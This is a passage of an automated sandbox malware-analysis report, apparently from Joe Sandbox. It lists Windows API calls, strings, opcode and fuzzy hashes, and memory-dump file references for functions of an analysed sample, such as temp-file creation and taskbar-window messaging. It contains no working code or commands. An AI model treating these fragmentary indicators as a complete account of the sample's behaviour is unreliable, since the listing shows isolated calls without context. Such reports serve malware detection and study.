                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: `5o$h5o
                                                                  • API String ID: 1385522511-1336408471
                                                                  • Opcode ID: 606716ff51ff4a74174eb0f42836e948ed876f35999fad930dcc836aea78161d
                                                                  • Instruction ID: c4aee6b6bebc5a141bb5f1072361836a892036164d83f2d053389874abc3056d
                                                                  • Opcode Fuzzy Hash: 606716ff51ff4a74174eb0f42836e948ed876f35999fad930dcc836aea78161d
                                                                  • Instruction Fuzzy Hash: E8E08635904938DBD754DB2CF9459E83367EB87320F100179E6168B3919B342A42DA98
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006939F0
                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00693A05
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: bb70fe1cf6413374305b0310d382a08efb37e1ac70efce1df8f58b36962c7f8a
                                                                  • Instruction ID: 6312f445ad234c211771a8d44692155295c3f944c142f2ebd95da96f135c9d3f
                                                                  • Opcode Fuzzy Hash: bb70fe1cf6413374305b0310d382a08efb37e1ac70efce1df8f58b36962c7f8a
                                                                  • Instruction Fuzzy Hash: 18D05EB250036867DB20A7699C0EFCB7A6CDB44710F0002A1BB5596091EAB0DA85CB90
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006B2E08
                                                                  • PostMessageW.USER32(00000000), ref: 006B2E0F
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: b0eee7a4636ed3b796d0d4c6223501c8b8b2b23389f031d88017332535b014ef
                                                                  • Instruction ID: 388bdea62926efcaae1b54e096623cb42d99493f028accef8455f2ddc0aa489f
                                                                  • Opcode Fuzzy Hash: b0eee7a4636ed3b796d0d4c6223501c8b8b2b23389f031d88017332535b014ef
                                                                  • Instruction Fuzzy Hash: EDD0A9323823007BE768B370AC0FFC26B129B04B00F1009247205AA0C0E8A068818658
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006B2DC8
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006B2DDB
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a75e2e3dc6b08d6f22152641d45c97231f11099e3622cdddfbadee6101132e81
                                                                  • Instruction ID: fd9e27add87d48edba50431fafb11860a86722a83def39022d7052a76f8d5c26
                                                                  • Opcode Fuzzy Hash: a75e2e3dc6b08d6f22152641d45c97231f11099e3622cdddfbadee6101132e81
                                                                  • Instruction Fuzzy Hash: 33D02236395300B7E778B370AC0FFD27B129F00B00F1009247309AE0C0E8E06881C754
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0065C213
                                                                  • GetLastError.KERNEL32 ref: 0065C221
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0065C27C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  • Opcode ID: 81d60072cbafea172721198a33fb9e521230cf4c786d36ced923320bda8e81de
                                                                  • Instruction ID: f184396727c9acc47e236a38b9136b52f55a50f9e99e7db46031d0eeb67474e2
                                                                  • Opcode Fuzzy Hash: 81d60072cbafea172721198a33fb9e521230cf4c786d36ced923320bda8e81de
                                                                  • Instruction Fuzzy Hash: 3441F670600706EFDB218FE4C844AFA7BA7AF11732F254169FC55AB2A1EB308E45C760